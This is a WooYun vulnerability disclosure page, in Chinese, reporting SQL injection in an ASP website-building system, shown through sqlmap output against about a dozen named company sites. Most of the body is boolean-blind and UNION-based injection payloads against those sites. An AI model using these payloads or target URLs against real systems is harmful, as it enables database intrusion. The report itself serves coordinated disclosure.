当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-089616

漏洞标题:某建站系统多个sql Injection打包(涉及大量企业站)

相关厂商:cncert国家互联网应急中心

漏洞作者: 从容

提交时间:2015-01-07 14:51

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-07: 细节已通知厂商并且等待厂商处理中
2015-01-12: 厂商已经确认,细节仅向厂商公开
2015-01-15: 细节向第三方安全合作伙伴开放
2015-03-08: 细节向核心白帽子及相关领域专家公开
2015-03-18: 细节向普通白帽子公开
2015-03-28: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

某建站系统多个sql Injection打包(涉及大量企业站)
Happy New Year~

详细说明:

前人漏洞: WooYun: 某建站系统多个sql注入点打包提交(影响大量企业站)
那位神奇的路人甲提交的是这几个文件存在注入:

bigSortProduct.asp?bigid=
productShow1.asp?id=
newsshow.asp?newsID=


其实不然,还有很多,俺就一锅端吧- -.

主要漏洞文件:
newsDetails.asp?newsID=
还有这几个文件:
helpDetails.asp?newsID=
newsDetails1.asp?newsID=
anliShow.asp?id=

漏洞证明:

http://www.jiakesmt.com/newsDetails1.asp?newsID=67

---
Place: GET
Parameter: newsID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsID=67 AND 6254=6254
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: newsID=67 UNION ALL SELECT CHR(113)&CHR(107)&CHR(118)&CHR(118)&CHR(
113)&CHR(112)&CHR(88)&CHR(87)&CHR(70)&CHR(74)&CHR(115)&CHR(115)&CHR(118)&CHR(104
)&CHR(104)&CHR(113)&CHR(107)&CHR(98)&CHR(107)&CHR(113),NULL,NULL,NULL,NULL,NULL,
NULL FROM MSysAccessObjects%16
---


http://www.jiakesmt.com/newsDetails.asp?newsID=255

---
Place: GET
Parameter: newsID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsID=255 AND 6393=6393
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: newsID=-2903 UNION ALL SELECT NULL,NULL,CHR(113)&CHR(113)&CHR(106)&
CHR(106)&CHR(113)&CHR(67)&CHR(98)&CHR(110)&CHR(97)&CHR(116)&CHR(112)&CHR(76)&CHR
(84)&CHR(115)&CHR(78)&CHR(113)&CHR(122)&CHR(120)&CHR(113)&CHR(113),NULL,NULL,NUL
L,NULL,NULL FROM MSysAccessObjects%16
---


http://www.bjjldh.com/newsDetails.asp?newsID=111

---
Place: GET
Parameter: newsID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsID=111 AND 1181=1181
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: newsID=111 UNION ALL SELECT NULL,NULL,CHR(113)&CHR(113)&CHR(120)&CH
R(106)&CHR(113)&CHR(107)&CHR(72)&CHR(89)&CHR(99)&CHR(118)&CHR(117)&CHR(90)&CHR(1
16)&CHR(104)&CHR(99)&CHR(113)&CHR(122)&CHR(118)&CHR(107)&CHR(113),NULL,NULL,NULL
,NULL FROM MSysAccessObjects%16
---


http://www.bjjldh.com/anliShow.asp?id=40

---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=40 AND 7203=7203
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=-4635 UNION ALL SELECT NULL,NULL,CHR(113)&CHR(98)&CHR(106)&CHR(1
13)&CHR(113)&CHR(118)&CHR(120)&CHR(69)&CHR(72)&CHR(82)&CHR(106)&CHR(77)&CHR(66)&
CHR(66)&CHR(80)&CHR(113)&CHR(106)&CHR(113)&CHR(118)&CHR(113),NULL,NULL,NULL,NULL
 FROM MSysAccessObjects%16
---


http://www.dgswky.com/newsDetails.asp?newsID=81

---
Place: GET
Parameter: newsID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsID=81 AND 6674=6674
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: newsID=-2643 UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(113)&CHR(118)
&CHR(106)&CHR(120)&CHR(113)&CHR(106)&CHR(116)&CHR(70)&CHR(90)&CHR(77)&CHR(87)&CH
R(118)&CHR(87)&CHR(66)&CHR(102)&CHR(113)&CHR(98)&CHR(118)&CHR(112)&CHR(113),NULL
,NULL FROM MSysAccessObjects%16
---


http://www.hzwbj.com/newsDetails.asp?newsID=135

---
Place: GET
Parameter: newsID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsID=135 AND 5579=5579
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: newsID=-8919 UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(113)&CHR(106)
&CHR(122)&CHR(113)&CHR(113)&CHR(76)&CHR(79)&CHR(69)&CHR(78)&CHR(76)&CHR(67)&CHR(
86)&CHR(105)&CHR(122)&CHR(113)&CHR(113)&CHR(120)&CHR(113)&CHR(107)&CHR(113),NULL
,NULL,NULL FROM MSysAccessObjects%16
---


http://www.17795.org/sykgj/newsDetails.asp?newsID=92

---
Place: GET
Parameter: newsID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsID=92 AND 6931=6931
---


http://www.zehaoxiangjiao.com/newsDetails.asp?newsID=156

---
Place: GET
Parameter: newsID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsID=156 AND 6122=6122
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: newsID=156 UNION ALL SELECT CHR(113)&CHR(120)&CHR(113)&CHR(122)&CHR
(113)&CHR(118)&CHR(118)&CHR(77)&CHR(108)&CHR(77)&CHR(97)&CHR(69)&CHR(70)&CHR(87)
&CHR(103)&CHR(113)&CHR(118)&CHR(106)&CHR(113)&CHR(113),NULL,NULL,NULL,NULL,NULL,
NULL,NULL FROM MSysAccessObjects%16
---


http://www.lyesmgjx.com/newsDetails.asp?newsID=298

---
Place: GET
Parameter: newsID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsID=298 AND 5429=5429
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: newsID=-5093 UNION ALL SELECT NULL,NULL,CHR(113)&CHR(112)&CHR(120)&
CHR(112)&CHR(113)&CHR(100)&CHR(114)&CHR(74)&CHR(113)&CHR(73)&CHR(115)&CHR(65)&CH
R(87)&CHR(108)&CHR(70)&CHR(113)&CHR(113)&CHR(120)&CHR(98)&CHR(113),NULL,NULL,NUL
L,NULL,NULL FROM MSysAccessObjects%16
---


http://www.wanguanjixie.cn/newsDetails.asp?newsID=5197

---
Place: GET
Parameter: newsID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsID=5197 AND 9419=9419
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: newsID=-2175 UNION ALL SELECT NULL,NULL,CHR(113)&CHR(120)&CHR(112)&
CHR(120)&CHR(113)&CHR(77)&CHR(119)&CHR(121)&CHR(102)&CHR(86)&CHR(85)&CHR(78)&CHR
(109)&CHR(74)&CHR(66)&CHR(113)&CHR(98)&CHR(120)&CHR(106)&CHR(113),NULL,NULL,NULL
,NULL,NULL FROM MSysAccessObjects%16
---


http://www.szzcj.com/newsDetails.asp?newsID=118

---
Place: GET
Parameter: newsID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsID=118 AND 6954=6954
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: newsID=-9691 UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(113)&CHR(118)
&CHR(120)&CHR(120)&CHR(113)&CHR(88)&CHR(108)&CHR(77)&CHR(87)&CHR(120)&CHR(107)&C
HR(78)&CHR(87)&CHR(86)&CHR(68)&CHR(113)&CHR(118)&CHR(106)&CHR(120)&CHR(113),NULL
,NULL,NULL FROM MSysAccessObjects%16
---


http://www.czchint.com/newsDetails.asp?newsID=145

---
Place: GET
Parameter: newsID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsID=145 AND 6769=6769
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: newsID=-3479 UNION ALL SELECT NULL,NULL,CHR(113)&CHR(98)&CHR(106)&C
HR(106)&CHR(113)&CHR(90)&CHR(101)&CHR(112)&CHR(76)&CHR(78)&CHR(104)&CHR(114)&CHR
(81)&CHR(101)&CHR(104)&CHR(113)&CHR(118)&CHR(107)&CHR(106)&CHR(113),NULL,NULL,NU
LL,NULL,NULL FROM MSysAccessObjects%16
---

修复方案:

过滤

版权声明:转载请注明来源 从容@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-01-12 11:31

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商的直接处置渠道,待认领。

最新状态:

暂无

漏洞评价:

评论